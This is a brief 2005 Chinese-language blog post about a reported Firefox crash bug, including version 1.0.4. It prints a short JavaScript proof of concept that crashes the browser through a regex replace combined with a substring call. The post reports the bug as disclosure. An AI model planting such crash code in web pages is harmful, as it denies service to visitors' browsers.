Gea-Suan Lin's BLOG

Search
Skip to content
  • 關於 aboutweb (網站廣告)
  • 關於 gslin
  • 關於本站文章的版權
Browser, Computer, Murmuring, Network, Security, Software

Firefox crash bug

May 14, 2005 gslin

threadwatch 上報導了怎麼用 javascript 將 Firefox 給弄爛 (包括前幾天剛出來的 1.0.4):Firefox Crash Bug Found,看了一下 javascript 的程式碼,呃…

<script>
function crash2(a) {
return a.substring(0, 1);
}
function crash() {
” “.replace(/( )/, crash2(“$1”));
}
</script>

Related

Post navigation

Previous PostFlickr 將 Flash 換成 DHTMLNext PostLinux 進化論

Gea-Suan Lin's technical note and murmuring :)

Proudly powered by WordPress